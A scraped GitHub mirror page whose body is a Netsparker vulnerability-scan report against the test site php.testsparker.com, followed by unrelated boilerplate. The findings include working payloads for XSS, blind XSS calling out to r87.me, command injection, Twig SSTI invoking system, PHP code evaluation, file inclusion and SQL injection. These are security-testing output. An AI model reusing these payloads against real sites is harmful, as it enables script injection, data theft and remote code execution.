louisianatiger / cloudmigration Goto Github PK
View Code? Open in Web Editor NEWAWS to OCI Cloud Migration
AWS to OCI Cloud Migration
URL: http://php.testsparker.com/nslookup.php
Name: [Possible] Cross-site Request Forgery
Severity: Low
Certainty: 90%
Form Action(s) :
/nslookup.php
Page Type :
Other
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/989020f238e646c9c15cad6404198061
This issue was created by Netsparker Enterprise to make sure that the integration settings are working properly.
URL: http://php.testsparker.com/products.php?pro='"--></style></scRipt><scRipt>netsparker(0x03E6FE)</scRipt>
Name: Cross-site Scripting
Severity: High
Confirmed: True
ParameterName: pro
ParameterType: GET
Payload: '"--></style></scRipt><scRipt>netsparker(0x03E6FE)</scRipt>
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/2eedc35206524f24e103ad64041a7904
URL: http://php.testsparker.com/artist.php?id=<scRipt>netsparker(0x03EA5C)</scRipt>
Name: Cross-site Scripting
Severity: High
Confirmed: True
ParameterName: id
ParameterType: GET
Payload: <scRipt>netsparker(0x03EA5C)</scRipt>
Proof URL :
http://php.testsparker.com/artist.php?id=%3cscRipt%3ealert(0x03EA5C)%3c%2fscRipt%3e
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/a4bd4f2e58d14c794b1dad64041a9435
URL: http://php.testsparker.com/clientaccesspolicy.xml
Name: Open Silverlight Client Access Policy
Severity: Medium
Confirmed: True
Policy Rules :
*
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/b37280cb056f427de1edad640420d801
URL: http://php.testsparker.com/artist.php?id=<iMg src=N onerror="this.onerror='';this.src='//jlcxsvyefhxerweikvxyafvqhvfo4sasdner3uxj'+'myw.r87.me/r/?'+location.href">
Name: Blind Cross-site Scripting
Severity: High
Confirmed: True
ParameterName: id
ParameterType: GET
Payload:
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/8aa9df0f1ea64f589ba2ad64041daabf
URL: http://php.testsparker.com/nslookup.php
Name: Command Injection
Severity: Critical
Confirmed: True
ParameterName: param
ParameterType: POST
Payload: '& SET /A 0xFFF9999-35832 &
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/2c4ff74d23dc459654d3ad64041b8710
URL: http://php.testsparker.com/
Name: Content Security Policy (CSP) Not Implemented
Severity: Best Practice
Certainty: 100%
Page Type :
Other
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/7df3aa3587ad4984ee92ad64041946e3
URL: http://php.testsparker.com/hello.php?name=Visitor
Name: [Possible] Internal Path Disclosure (Windows)
Severity: Information
Certainty: 75%
Page Type :
Other
Identified Internal Path(s) :
C:\AppServ\www\hello.php
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/094c787ca6374ad784b3ad6404197184
URL: http://php.testsparker.com/auth/?nsextt=367126'"250821
Name: Unexpected Redirect Response Body (Too Large)
Severity: Information
Certainty: 70%
ParameterName: nsextt
ParameterType: GET
Payload: 367126'"250821
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/2764218b3a614424ef92ad72036f5d3c
URL: http://php.testsparker.com/
Name: Apache Web Server Identified
Severity: Information
Certainty: 90%
Page Type :
Other
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/e86133003b0b4afbea3cad6404194464
URL: http://php.testsparker.com/artist.php?id=1ACUSTARTFILE/../../xxx\..\..\ACUENDFILE
Name: Database Error Message Disclosure
Severity: Low
Certainty: 40%
ParameterName: id
ParameterType: GET
Payload: 1ACUSTARTFILE/../../xxx....\ACUENDFILE
Page Type :
Other
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/1b622827ceef4a6bd848ad720370c7e7
URL: http://php.testsparker.com/.svn/all-wcprops
Name: SVN Detected
Severity: High
Confirmed: True
ParameterName: URI-BASED
ParameterType: Full URL
Payload: .svn/all-wcprops
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/03301254c9b248b73af7ad6404196075
URL: http://php.testsparker.com/artist.php?id=482810 434075
Name: SQL Injection (IAST)
Severity: Critical
Confirmed: True
ParameterName: id
ParameterType: GET
Payload: 482810 434075
[IAST] Source File :
C:/AppServ/www/Programmatic/mysqlCall.php on line 89
[IAST] Extra Information :
"mysql_query" was called.
Stack trace:
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/631e17a592724ecf0fa9ad720370d64f
URL: http://php.testsparker.com/
Name: Referrer-Policy Not Implemented
Severity: Best Practice
Certainty: 90%
Page Type :
Other
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/5c01290b246f4cbef428ad640419479d
URL: http://php.testsparker.com/auth/images/
Name: Directory Listing (Apache)
Severity: Information
Certainty: 90%
Page Type :
Other
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/09379edaab574de92d2cad640419a175
URL: http://php.testsparker.com/nslookup.php
Name: [Possible] Internal IP Address Disclosure
Severity: Low
Certainty: 50%
Page Type :
Other
Extracted IP Address(es) :
172.30.0.2
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/39dcdaf40d9e4d5c3ffcad640419a657
URL: http://php.testsparker.com/products.php?pro='"--></style></scRipt><scRipt src="//jlcxsvyefhyzkeqaieedq2giznn1torh-hn0m2ywsrg.r87.me"></scRipt>
Name: [Possible] Blind Cross-site Scripting
Severity: High
Certainty: 70%
ParameterName: pro
ParameterType: GET
Payload: '"--></style></scRipt><scRipt src="//jlcxsvyefhyzkeqaieedq2giznn1torh-hn0m2ywsrg.r87.me"></scRipt>
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/7d9c50fdef9e40199a20ad64041daa64
URL: http://php.testsparker.com/
Name: Out-of-date Version (PHP)
Severity: Critical
Certainty: 90%
Identified Version :
5.2.6
Latest Version :
8.0.8
Vulnerability Database :
Result is based on 07/14/2021 15:00:00 vulnerability database content.
Page Type :
Other
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/e11aceb9b6224c24e020ad6404194320
URL: http://php.testsparker.com/images/
Name: OPTIONS Method Enabled
Severity: Information
Confirmed: True
Allowed methods :
GET, HEAD, POST, OPTIONS, TRACE
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/1e27deef28b24f8f9f3ead6404256beb
URL: http://php.testsparker.com/auth/xss.php
Name: Blind Cross-site Scripting
Severity: High
Confirmed: True
ParameterName: search
ParameterType: POST
Payload:
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/2d3adcb5880a4cef9cf0ad64041dab1d
URL: http://php.testsparker.com/artist.php?id={{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("SET /A 268409241 - 8073")}}
Name: Code Execution via SSTI (PHP Twig)
Severity: Critical
Confirmed: True
ParameterName: id
ParameterType: GET
Payload: {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("SET /A 268409241 - 8073")}}
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/a6130f4da4f047fc1a28ad64041a8564
URL: http://php.testsparker.com/crossdomain.xml
Name: Open Policy Crossdomain.xml Detected
Severity: Medium
Confirmed: True
Policy Rules :
<allow-access-from domain="*" />
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/c5dc79bf862e44a9d82ead640420d424
URL: http://php.testsparker.com/
Name: PHP register_globals Is Enabled
Severity: Medium
Confirmed: True
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/a0ac944789e04dcf7689ad72036f3f4d
URL: http://php.testsparker.com/products.php?pro=hTTp://r87.com/n
Name: Subresource Integrity (SRI) Not Implemented
Severity: Best Practice
Certainty: 100%
ParameterName: pro
ParameterType: GET
Payload: hTTp://r87.com/n
Identified Sub Resource(s) :
http://r87.com/n
Page Type :
Other
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/1ccb674ac07d4205aa59ad64041a19c7
URL: http://php.testsparker.com/auth/internal.php
Name: Cookie Not Marked as HttpOnly
Severity: Low
Confirmed: True
Identified Cookie(s) :
PHPSESSID
Cookie Source :
HTTP Header
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/8bf52b74f184411f46ecad640419179c
URL: http://php.testsparker.com/
Name: Missing X-Frame-Options Header
Severity: Low
Certainty: 90%
Page Type :
Other
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/1aa3824ba0b74fceed32ad6404194548
URL: http://php.testsparker.com/auth/style
Name: Apache MultiViews Enabled
Severity: Low
Certainty: 90%
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/3a2be832a9954abe306cad640419589a
URL: http://php.testsparker.com/hello.php?name=+gethostbyname(trim('jlcxsvyefhmttrq1l0_a4v3toqijhfq6xfry3yzq'.'31m.r87.me'));//
Name: Out of Band Code Evaluation (PHP)
Severity: Critical
Confirmed: True
ParameterName: name
ParameterType: GET
Payload: +gethostbyname(trim('jlcxsvyefhmttrq1l0_a4v3toqijhfq6xfry3yzq'.'31m.r87.me'));//
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/126def9424c74bfc986aad64041daa17
URL: http://php.testsparker.com/
Name: Version Disclosure (Apache)
Severity: Low
Certainty: 90%
Page Type :
Other
Extracted Version :
2.2.8
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/5e98feefe6a74fc7dd33ad64041942ab
URL: http://php.testsparker.com/
Name: PHP allow_url_fopen Is Enabled
Severity: Low
Confirmed: True
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/489544a019e84d087a69ad72036f4059
URL: http://php.testsparker.com/robots.txt
Name: Robots.txt Detected
Severity: Information
Confirmed: True
Interesting Robots.txt Entries :
Disallow: /
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/04694a760ed34d1326f9ad640420ebe7
URL: http://php.testsparker.com/process.php?file=/../../../../../../../../../../windows/win.ini%00.nsp
Name: Local File Inclusion
Severity: High
Confirmed: True
ParameterName: file
ParameterType: GET
Payload: /../../../../../../../../../../windows/win.ini%00.nsp
[IAST] Source File :
C:/AppServ/www/process.php on line 25
[IAST] Extra Information :
"include" was called. Payload: /../../../../../../../../../../windows/win.ini�.nsp
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/131f1de5ce8f4000a99dad640419c516
URL: http://php.testsparker.com/process.php?file=http://r87.com/n?%00.nsp
Name: Remote File Inclusion
Severity: Critical
Confirmed: True
ParameterName: file
ParameterType: GET
Payload: http://r87.com/n?%00.nsp
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/5c0c4b6f4a3c4cfdb6eead640419c9b7
URL: http://php.testsparker.com/hello.php?name=Visitor
Name: Programming Error Message
Severity: Low
Certainty: 90%
Page Type :
Other
Identified Error Message :
<b>Parse error</b>: syntax error, unexpected T_STRING in <b>C:\AppServ\www\hello.php(26) : eval()'d code</b> on line <b>1</b>
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/9445d2722423487b8461ad64041970a3
URL: http://php.testsparker.com/artist.php?id=-1 OR 17-7=10
Name: Boolean Based SQL Injection
Severity: Critical
Confirmed: True
ParameterName: id
ParameterType: GET
Payload: -1 OR 17-7=10
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/43519d9c20d5402097a0ad64041da994
URL: http://php.testsparker.com/
Name: Missing X-XSS-Protection Header
Severity: Best Practice
Certainty: 90%
Page Type :
Other
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/45ba456d6e614405edd0ad64041945fe
URL: http://php.testsparker.com/hello.php?name=INJECTIONSTART'"*/
<?phpINJECTIONEND
Name: Code Evaluation (PHP) - IAST
Severity: Critical
Confirmed: True
ParameterName: name
ParameterType: GET
Payload: INJECTIONSTART'"*/
URL: http://php.testsparker.com/
Name: Version Disclosure (PHP)
Severity: Low
Certainty: 90%
Page Type :
Other
Extracted Version :
5.2.6
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/2ebdeeff17fd4d8de558ad64041943d6
URL: http://php.testsparker.com/artist.php?id=<iframe src="http://r87.com/?"></iframe>
Name: Frame Injection
Severity: Medium
Confirmed: True
ParameterName: id
ParameterType: GET
Payload: <iframe src="http://r87.com/?"></iframe>
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/0bcecec3914e469fcb8aad64041abf56
URL: http://php.testsparker.com/process.php?file=Generics/contact.nsp
Name: Insecure Frame (External)
Severity: Low
Confirmed: True
Frame Source(s) :
http://maps.google.com/maps?q=mavituna+security&output=embed
Parsing Source :
DOM Parser
Page Type :
Contact
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/69c0e36cd1f24e21c471ad6404198169
URL: http://php.testsparker.com/
Name: PHP allow_url_include Is Enabled
Severity: Low
Confirmed: True
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/88126299ce474cc57c62ad72036f4183
URL: http://php.testsparker.com/
Name: PHP display_errors Is Enabled
Severity: Low
Confirmed: True
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/36fe7ff01f1740267469ad72036f3df0
URL: https://php.testsparker.com/
Name: SSL/TLS Not Implemented
Severity: Medium
Certainty: 100%
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/88d505b47945488b01c9ad6404194c9d
URL: http://php.testsparker.com/artist.php?id=%{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("a",268409241-87309)}
Name: Internal Server Error
Severity: Low
Confirmed: True
ParameterName: id
ParameterType: GET
Payload: %{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("a",268409241-87309)}
Page Type :
Other
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/7ec08207d11645ba02aaad64041a7da0
URL: http://php.testsparker.com/
Name: Out-of-date Version (Apache)
Severity: Critical
Certainty: 90%
Identified Version :
2.2.8
Latest Version :
2.4.48
Vulnerability Database :
Result is based on 07/14/2021 15:00:00 vulnerability database content.
Page Type :
Other
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/16a14807d1474554dd22ad6404194240
URL: http://php.testsparker.com/process.php?file=Generics/contact.nsp
Name: Email Address Disclosure
Severity: Information
Certainty: 95%
Email Address(es) :
[email protected]
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/1d6df94cc3074397b060ad6404197c63
URL: http://php.testsparker.com/
Name: TRACE/TRACK Method Detected
Severity: Low
Confirmed: True
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/5a35064894604e773753ad6404195d12
URL: http://php.testsparker.com/auth/internal.php
Name: SameSite Cookie Not Implemented
Severity: Best Practice
Certainty: 100%
Identified Cookie(s) :
PHPSESSID
Cookie Source :
HTTP Header
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/1d90ee2b561e40304784ad640419184e
URL: http://php.testsparker.com/c:/boot.ini
Name: Forbidden Resource
Severity: Information
Confirmed: True
ParameterName: URI-BASED
ParameterType: Full URL
Payload: c:\boot.ini
Page Type :
Other
You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/c36e6652976e496e395cad6404195e5a
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.